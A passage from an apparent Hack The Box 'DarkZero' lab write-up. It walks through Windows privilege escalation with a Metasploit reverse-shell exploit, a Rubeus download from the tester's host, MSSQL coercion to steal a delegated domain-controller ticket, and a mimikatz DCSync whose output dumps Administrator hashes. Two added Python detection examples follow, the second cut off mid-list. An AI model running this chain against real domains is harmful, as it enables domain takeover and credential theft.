46 exploit/windows/local/tokenmagic No The target is not exploitable.
47 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
48 exploit/windows/local/webexec No The check raised an exception.
49 exploit/windows/local/win_error_cve_2023_36874 No The target is not exploitable.
- I put the current session in the background and ran the module for the `authz_basep` exploit against it (`SESSION 2`), using a separate handler port (4445) so the new session does not collide with the first handler.
meterpreter > background
[*] Backgrounding session 2...
msf exploit(multi/handler) > use exploit/windows/local/cve_2024_30088_authz_basep
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/cve_2024_30088_authz_basep) > set SESSION 2
SESSION => 2
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LHOST 10.10.16.45
LHOST => 10.10.16.45
msf exploit(windows/local/cve_2024_30088_authz_basep) > set LPORT 4445
LPORT => 4445
msf exploit(windows/local/cve_2024_30088_authz_basep) > run
[*] Started reverse TCP handler on 10.10.16.45:4445
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
[*] Reflectively injecting the DLL into 3988...
[+] The exploit was successful, reading SYSTEM token from memory...
[+] Successfully stole winlogon handle: 784
[+] Successfully retrieved winlogon pid: 616
[*] Sending stage (203846 bytes) to 10.129.174.93
[*] Meterpreter session 2 opened (10.10.16.45:4445 -> 10.129.174.93:53643) at 2025-10-05 06:24:28 +0200
meterpreter >
- And now I had a shell back as `NT AUTHORITY\SYSTEM` on DC02.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
- This allowed me to grab `user.txt` from the Desktop of Administrator on DC02.
meterpreter > cat C:\\Users\\Administrator\\Desktop\\user.txt
6285a04da10fe74f3523728444dfd022
Privilege Escalation to SYSTEM on DC01
- I still had the Unconstrained Delegation in the back of my head. The easiest way I could think of was to catch a ticket on DC02 using Rubeus and trigger the authentication from DC01 through MSSQL. To make things easy, I created a SOCKS5 proxy through Metasploit to reach the MSSQL instance on DC01.
msf exploit(windows/local/cve_2024_30088_authz_basep) > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
SRVHOST => 127.0.0.1
msf auxiliary(server/socks_proxy) > set SRVPORT 1080
SRVPORT => 1080
msf auxiliary(server/socks_proxy) > set VERSION 5
VERSION => 5
msf auxiliary(server/socks_proxy) > run -j
[*] Auxiliary module running as background job 0.
msf auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
┌──(kali@kali)-[~/HTB/DarkZero]
└─$ proxychains4 -q impacket-mssqlclient 'darkzero.htb/john.w:RFulUtONCOL!'@'DC01.darkzero.htb' -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)>
Use Rubeus to catch the Ticket Granting Ticket (TGT)
- I moved Rubeus over to DC02 and fired it up in `monitor` mode, polling every second and filtering on `DC01$`, to listen for incoming tickets. This only worked because I had elevated my privileges to SYSTEM first: pulling tickets out of other logon sessions requires it.
meterpreter > shell
Process 124 created.
Channel 2 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\temp> iwr 10.10.16.45/Rubeus.exe -o Rubeus.exe
C:\temp\Rubeus.exe monitor /interval:1 /filteruser:DC01$ /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: TGT Monitoring
[*] Target user : DC01$
[*] Monitoring every 1 seconds for new TGTs
- Next I used `xp_dirtree` from the MSSQL shell on DC01 to request a (non-existent) share on DC02. `xp_dirtree` needs no special role (the session is still `guest@master`), but the SMB connection is made by the SQL Server service process on DC01 under its own identity, and that is the identity that gets coerced into authenticating to DC02.
SQL (darkzero\john.w guest@master)> xp_dirtree \\DC02.darkzero.ext\foobar
subdirectory depth file
------------ ----- ----
SQL (darkzero\john.w guest@master)>
- And Rubeus caught the ticket I was looking for: a TGT for `DC01$@DARKZERO.HTB` with the `forwarded` flag set, i.e. the delegated copy that was sent along to DC02.
[*] 10/5/2025 11:22:49 AM UTC - Found new TGT:
User : DC01$@DARKZERO.HTB
StartTime : 10/5/2025 4:22:48 AM
EndTime : 10/5/2025 2:22:48 PM
RenewTill : 10/12/2025 4:22:48 AM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
<base64 TGT blob, shown in full in the echo command below>
[*] Ticket cache size: 1
- Next I imported the ticket on DC02 using Rubeus again (`ptt`). At this point it was a bit of switching sessions back and forth within Metasploit.
^Z
Background channel 2? [y/N] y
meterpreter >
meterpreter > shell
Process 676 created.
Channel 3 created.
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
C:\Windows\system32>echo "doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDYPPzgInQu2joilihgD51S/tHe9LnYS/EqXm5T1cl82tmQx7MgKt03n8Lf7b4RE3lTxRinPevS9AHAD78RmgMr6R4/b+jxUZLrK7x+WrAHg70iX7q6/9EBj3wUE5ISrkhnhHUmM2e8Xd6dug+3RhbiC0McqfsHhHA3n/enCq+vCkhSkcv7NZF3TGHbU/wIK0rFpwacqxIUbgvWkwVuG+ds0aQG3/5WQXnNpOZ9KUOl3xC+8MhLlXkJokCa4VvKSFVVe96uFHLsSiTzKffWz5OIysaUJq5rRc4+fb/QVpSlyGuoi2MJnDocvtFPRtH/6B/01lv2VnKDUh3rebkMwl/bZi+NUuHSr8b97UpWqLAIiO7W3UWaqG531rBAJ37LxrRWC0xjK7egOSZbmq+Wn2gyKd1Xl+/XNPUR9KK83L6dW+IOLSYcAmZmv1VbanvnRs1WDsNic2Il6sGluHye2ws/JXMNgHSA8IRpGlRU9zxS3E+/hmz7itLjk0nQURlJzjoQearRpEIUv0V4Md8p5GRnqg6hbmkbd22UKKVtHOEU1bwEGJeAZfSHrqx6em5hgLp0wr/Bl7pMIuBEbXPHFjb0a0JNWmBo51HWXer0Jju5ZWwK+RzadXiOkv+n+SlMoDvvFOqfb9ARJ+HiIgalndcR9FjeciBPa96tz+5wbEsUhFY7hfdkMkufN1zcxA1nQGYUAdrVcU9J97lLGs1qG5Tk9SKlYrTT3eupNc7+PzVNOXG211ht9TNigrNGX+2gz5nvLJbOqTB3QHbWvAFufV2fIo8BZIh44iaDUKyX5uMJVOPpU5E6jKmZpMrPCX/Y6uhZSg6DltuFNh3SnUM9e3zGRS6irqMdynYQHu3916o3t2ZB5Xp8PuhvnaO43Q9zeCEwmFVSJ4XvtezFBUXHjBtGBD05WqnqwBeZ5ZmRVwRNdrrWChqbR8A0yssIUeOzn2lqMWwYPF0/VLvP7Z3869T7mq6T2gwKhv5rKASSYW0oCPaP2YqoJoZdNi/T9QF8OXodzKnJ+e22cPuzb3/3YNiYrhf3IkcklB0rlyLMn9WdjIL2PhJH28/LwmcDDWQicKSp+0AJqL7LOJMT2zrJUEQ18g5Esh248kM2t469wGDA7UoRWdROJl+l31I5JEezxEoOWVQrqzlUJEePyheRoI5ta128sgYeVqbfVhYojgOgP9aJc0XgHXc6Q9YxvO+8sKqRnPQM1Nu5o1sNivB7vSYMwNk3xBIkzgcQHQuivOSou4fhPZpv/ncGUDjRdvJpctNDNTMqhQoVCHqlb/Jr6bSebJwz88VF2fZDwTziz9YP13CRcFwb/ZH/rOKEiK8EJ9dTChEqDFeWZos0QffRUdmOpDPCQWLt/yPHCccVg1VlpL6gBZBEi9FMcpuFhiGzjivykPhADDJjO/F/eoOsC5cEWcW0yf9fSo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQg+jdktWSWR/d4MMioGgZigZAgoExtvibbf7tLau8mX4ehDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDUxMTIyNDhaphEYDzIwMjUxMDA1MjEyMjQ4WqcRGA8yMDI1MTAxMjExMjI0OFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=" > C:\temp\dc01.b64
C:\temp>Rubeus.exe ptt /ticket:<base64 TGT blob, as echoed above>
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
[*] Action: Import Ticket
[+] Ticket successfully imported!
- A quick verification with `klist` showed that everything worked according to plan.
C:\temp>Rubeus.exe klist
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.3
Action: List Kerberos Tickets (All Users)
[*] Current LUID : 0x3e7
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x57b01
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:17:07 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:17:07 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : GC/DC02.darkzero.ext/darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : Administrator
Domain : darkzero-ext
LogonId : 0x364ea
UserSID : S-1-5-21-1969715525-31638512-2552845157-500
AuthenticationPackage : Kerberos
LogonType : Batch
LogonTime : 10/4/2025 7:05:20 PM
LogonServer : DC02
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName : Administrator@darkzero.ext
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:05:20 PM ; 10/5/2025 5:05:20 AM ; 10/11/2025 7:05:20 PM
Server Name : krbtgt/DARKZERO.EXT @ DARKZERO.EXT
Client Name : Administrator @ DARKZERO.EXT
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
UserName : svc_sql
Domain : darkzero-ext
LogonId : 0x29849
UserSID : S-1-5-21-1969715525-31638512-2552845157-1103
AuthenticationPackage : Kerberos
LogonType : Service
LogonTime : 10/4/2025 7:04:16 PM
LogonServer : DC02
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName : svc_sql@darkzero.ext
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 8:07:53 PM ; 10/5/2025 6:06:37 AM ; 10/11/2025 8:06:37 PM
Server Name : krbtgt/DARKZERO.HTB @ DARKZERO.EXT
Client Name : svc_sql @ DARKZERO.EXT
Flags : name_canonicalize, pre_authent, renewable, forwardable (40a10000)
[1] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 8:07:53 PM ; 10/5/2025 6:06:37 AM ; 10/11/2025 8:06:37 PM
Server Name : ldap/dc01.darkzero.htb @ DARKZERO.HTB
Client Name : svc_sql @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
[2] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 8:06:37 PM ; 10/5/2025 6:06:37 AM ; 10/11/2025 8:06:37 PM
Server Name : cifs/dc01.darkzero.htb @ DARKZERO.HTB
Client Name : svc_sql @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x2314c
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:37 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : ldap/DC02.darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x3e4
UserSID : S-1-5-20
AuthenticationPackage : Negotiate
LogonType : Service
LogonTime : 10/4/2025 7:01:53 PM
LogonServer :
LogonServerDNSDomain :
UserPrincipalName : DC02$@darkzero.ex
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 8:02:05 PM ; 10/5/2025 6:02:05 AM ; 10/11/2025 8:02:05 PM
Server Name : krbtgt/DARKZERO.EXT @ DARKZERO.EXT
Client Name : dc02$ @ DARKZERO.EXT
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
[1] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 8:02:05 PM ; 10/5/2025 6:02:05 AM ; 10/11/2025 8:02:05 PM
Server Name : DNS/dc02.darkzero.ext @ DARKZERO.EXT
Client Name : dc02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : Administrator
Domain : darkzero-ext
LogonId : 0x70db7b
UserSID : S-1-5-21-1969715525-31638512-2552845157-500
AuthenticationPackage : Kerberos
LogonType : Batch
LogonTime : 10/5/2025 4:05:20 AM
LogonServer : DC02
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName : Administrator@darkzero.ext
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/5/2025 4:05:20 AM ; 10/5/2025 2:05:20 PM ; 10/12/2025 4:05:20 AM
Server Name : krbtgt/DARKZERO.EXT @ DARKZERO.EXT
Client Name : Administrator @ DARKZERO.EXT
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable (40e10000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x28ac2
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:03:38 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:03:38 PM ; 10/5/2025 5:02:37 AM ; 10/11/2025 7:02:37 PM
Server Name : krbtgt/DARKZERO.EXT @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x2763e
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:46 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : LDAP/DC02.darkzero.ext/darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x22cbc
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:37 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : LDAP/DC02.darkzero.ext/darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x22b29
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:37 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : ldap/DC02.darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x226d8
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:37 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : ldap/DC02.darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x223bf
UserSID : S-1-5-18
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 10/4/2025 7:02:37 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.EXT
UserPrincipalName :
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/4/2025 7:02:37 PM ; 10/5/2025 5:02:37 AM ; 12/31/1600 4:00:00 PM
Server Name : ldap/DC02.darkzero.ext @ DARKZERO.EXT
Client Name : DC02$ @ DARKZERO.EXT
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x3e7
UserSID : S-1-5-18
AuthenticationPackage : Negotiate
LogonType : 0
LogonTime : 10/4/2025 7:01:50 PM
LogonServer :
LogonServerDNSDomain : darkzero.ext
UserPrincipalName : DC02$@darkzero.ext
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/5/2025 4:22:48 AM ; 10/5/2025 2:22:48 PM ; 10/12/2025 4:22:48 AM
Server Name : krbtgt/DARKZERO.HTB @ DARKZERO.HTB
Client Name : DC01$ @ DARKZERO.HTB
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
- And there it was: a TGT for `krbtgt/DARKZERO.HTB` with a client name of `DC01$`.
<--- CUT FOR BREVITY --->
UserName : DC02$
Domain : darkzero-ext
LogonId : 0x3e7
...
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 10/5/2025 4:22:48 AM ; 10/5/2025 2:22:48 PM ; 10/12/2025 4:22:48 AM
Server Name : krbtgt/DARKZERO.HTB @ DARKZERO.HTB
Client Name : DC01$ @ DARKZERO.HTB
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
<--- CUT FOR BREVITY --->
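The check the author did by eye, as an added example that is not part of the original post: a small parser for the Rubeus dump format shown above that flags any TGT cached in a logon session for a principal other than the session's own account, which is how the `DC01$` ticket stands out on `DC02`. The sample dump is constructed from the fields above; note that the `forwarded` flag alone is not the signal, since `DC02$`'s own forwarded TGT is legitimately present.

```python
"""Flag TGTs cached for some other principal in a Rubeus 'dump' style listing."""
import re

# Matches the 'Key : value' lines of the dump; ticket headers like '[0] - 0x12 - ...' are skipped.
FIELD = re.compile(r"^\s*([A-Za-z/ ]+?)\s*:\s*(.*?)\s*$")

def delegated_tgts(dump):
    """Return TGTs (krbtgt/...) whose client principal differs from the owning logon session."""
    findings, session, ticket = [], {}, {}
    for line in dump.splitlines():
        if not (m := FIELD.match(line)):
            continue
        key, value = m.groups()
        if key == "UserName":                  # every logon session block starts here
            session = {"UserName": value}
        elif key in ("LogonId", "LogonServerDNSDomain"):
            session[key] = value
        elif key == "Server Name":             # a new ticket within the session
            ticket = {"server": value}
        elif key == "Client Name":
            ticket["client"] = value
        elif key == "Flags":                   # last line of a ticket: evaluate it
            own = f"{session['UserName']} @ {session.get('LogonServerDNSDomain', '')}".upper()
            if ticket["server"].startswith("krbtgt/") and ticket["client"].upper() != own:
                findings.append({"logon_id": session["LogonId"], "client": ticket["client"],
                                 "forwarded": "forwarded" in value})
    return findings

# Constructed sample, trimmed to the fields used, in the layout of the dump above.
SAMPLE_DUMP = """
  UserName                 : DC02$
  LogonId                  : 0x28ac2
  LogonServerDNSDomain     : DARKZERO.EXT
      Server Name       : krbtgt/DARKZERO.EXT @ DARKZERO.EXT
      Client Name       : DC02$ @ DARKZERO.EXT
      Flags             : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
  UserName                 : DC02$
  LogonId                  : 0x3e7
  LogonServerDNSDomain     : darkzero.ext
      Server Name       : krbtgt/DARKZERO.HTB @ DARKZERO.HTB
      Client Name       : DC01$ @ DARKZERO.HTB
      Flags             : name_canonicalize, pre_authent, renewable, forwarded, forwardable (60a10000)
"""

if __name__ == "__main__":
    for f in delegated_tgts(SAMPLE_DUMP):
        print(f"logon {f['logon_id']}: TGT for {f['client']} (forwarded={f['forwarded']})")
```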
DCSync Attack
- As the last step, I loaded `mimikatz` once more, but this time performed the `DCSync` from within `DC02`.
- And grabbed the `hash` for `Administrator` on `DC01` to gain access via `Evil-WinRM` later.
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
meterpreter > kiwi_cmd "lsadump::dcsync /domain:darkzero.htb /user:Administrator"
[DC] 'darkzero.htb' will be the domain
[DC] 'DC01.darkzero.htb' will be the DC server
[DC] 'Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 9/10/2025 9:42:44 AM
Object Security ID : S-1-5-21-1152179935-589108180-1989892463-500
Object Relative ID : 500
Credentials:
Hash NTLM: 5917507bdf2ef2c2b0a869a1cba40726
ntlm- 0: 5917507bdf2ef2c2b0a869a1cba40726
ntlm- 1: 5917507bdf2ef2c2b0a869a1cba40726
lm - 0: 58ef66870a9927dd48b3bd9d7e03845f
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : eb8f12be2ec1b48c9b9ed472823e4e60
* Primary:Kerberos-Newer-Keys *
Default Salt : DARKZERO.HTBAdministrator
Default Iterations : 4096
Credentials
des_cbc_md5_nt (4096) : 2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
unknow (4096) : a23315d970fe9d556be03ab611730673
aes256_hmac (4096) : d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
aes128_hmac (4096) : b1e04b87abab7be2c600fc652ac84362
rc4_hmac_nt (4096) : 5917507bdf2ef2c2b0a869a1cba40726
ServiceCredentials
des_cbc_md5_nt (4096) : 2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
unknow (4096) : a23315d970fe9d556be03ab611730673
aes256_hmac (4096) : d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
aes128_hmac (4096) : b1e04b87abab7be2c600fc652ac84362
OldCredentials
des_cbc_md5_nt (4096) : 298bc77657a3737b452bb09be407d46b795774e5c3bbfcc68e8f0a4015b59459
unknow (4096) : d1d84cca796daa8d9dda56c9fbd29110
aes256_hmac (4096) : fe0ba028010ee4f408ebc846d3f480c1880a4f0274acdb226d3afcdc3595dc21
aes128_hmac (4096) : a2a7e0e9a4b5ade57242b3e97756dca3
rc4_hmac_nt (4096) : 5917507bdf2ef2c2b0a869a1cba40726
OlderCredentials
des_cbc_md5_nt (4096) : d828032ab803aa2d52a9db423de22fe27af55a9fd2101037b106e856ef515216
unknow (4096) : 5f9f4fbb6a67b92e5ec7b34c3ba9d322
aes256_hmac (4096) : ead37d7deb508c2ad7fd748960cb115d0857b23d95a69cfc95fa693d9d2ca987
aes128_hmac (4096) : d027d6dfa67d37190ea37579b948874a
rc4_hmac_nt (4096) : cf3a5525ee9414229e66279623ed5c58
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 059775b62c039e3def2ae0dd3cf5fdeb
02 cd2cdff8fba2798b8f5736af3b0617e2
03 f807da3ed4e91404a7b9e87915b92114
04 059775b62c039e3def2ae0dd3cf5fdeb
05 3209c6585c69e581da8b23ad280d48aa
06 c75dced3815eff7f99a6ef67018be23e
07 0fca3845bf99227b23ac897eb7e7246d
08 7d1a78d4cc10d91caf276f70790866c2
09 cec6c4e88dbb2e0b2cf3c87ff44cd372
10 81ee716a17e92b26d65b932c55ceaa54
11 5a808b7dd291f85e64e53439a7520d42
12 7d1a78d4cc10d91caf276f70790866c2
13 c421d8af0cfd4330cf4312d05e135127
14 47b49319d1bb83cc2f6fc2767acb9dc6
15 13ad2c29ee304491557ebfef55693708
16 7f8a2135bf0aac335296f86f84660fb0
17 fa7267a1c55c45633b83a34d05f0056f
18 b8f360edd930f882d000d03bc07d0973
19 8ed43db2829682a63b52f73037ea654b
20 276189d18309b00e3e36f4fc3b936677
21 1726c96c2c2998836f09fe572eada8d9
22 bdbd5d774b16233eab9c00804b12601a
23 9131f6686281d29fc473b940d1a1c022
24 2e1e69803702ba4e530debd3b5d5ee74
25 1b79e43d6f356574fdab541ec4ebe0b8
26 e64552e3066c37621f8a7132b64b3a15
27 bd8a3360652182c95cbc4c54553f330f
28 9e10974f986144193c8499681c658880
29 61c17ed3d006e5d2d56c2b2f86e0bdd2
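From the defender's side, as an added example that is not part of the original post: a correlation of Security events 4662 (directory service access) and 4624 (logon) that flags replication requests like the one above, both from non-DC accounts and, as in this case, from a DC machine account whose ticket is used from a host that is not a DC. The DC inventory, addresses and event values are constructed assumptions, not data from the box.

```python
"""Hunt for DCSync-style replication requests by correlating Security events 4662 and 4624."""
# Extended-right GUIDs that grant directory replication (the rights DCSync relies on).
REPLICATION_RIGHTS = {
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}",  # DS-Replication-Get-Changes
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",  # DS-Replication-Get-Changes-All
    "{89e95b76-444d-4c62-991a-0facbeda640c}",  # DS-Replication-Get-Changes-In-Filtered-Set
}
# Assumed inventory (hypothetical values): DC machine accounts and the addresses DCs replicate from.
DC_ACCOUNTS = {"DC01$"}
DC_ADDRESSES = {"10.10.10.1"}

def dcsync_alerts(events, dc_accounts=DC_ACCOUNTS, dc_addresses=DC_ADDRESSES):
    """Return (account, source address, reason) for replication requests that look like DCSync."""
    # 4624 tells us where each logon session came from; 4662 only names the session.
    source_by_logon = {e["TargetLogonId"]: e["IpAddress"] for e in events if e["EventID"] == 4624}
    alerts = []
    for e in events:
        if e["EventID"] != 4662 or e["AccessMask"] != "0x100":   # 0x100 = Control Access
            continue
        if not REPLICATION_RIGHTS & set(e["Properties"].split()):  # some other extended right
            continue
        user, source = e["SubjectUserName"], source_by_logon.get(e["SubjectLogonId"], "unknown")
        if user not in dc_accounts:
            alerts.append((user, source, "replication by non-DC account"))
        elif source not in dc_addresses:
            alerts.append((user, source, "DC account replicating from a non-DC address"))
    return alerts

# Constructed sample in the shape of parsed Security log fields (not real log data).
SAMPLE_EVENTS = [
    {"EventID": 4624, "TargetUserName": "DC01$", "TargetLogonId": "0x1a2b", "IpAddress": "10.10.10.1"},
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x1a2b", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},  # routine DC-to-DC replication
    {"EventID": 4624, "TargetUserName": "DC01$", "TargetLogonId": "0x3c4d", "IpAddress": "10.10.10.2"},
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectLogonId": "0x3c4d", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},  # a DC's TGT used from another host
    {"EventID": 4624, "TargetUserName": "svc_sql", "TargetLogonId": "0x5e6f", "IpAddress": "10.10.10.50"},
    {"EventID": 4662, "SubjectUserName": "svc_sql", "SubjectLogonId": "0x5e6f", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
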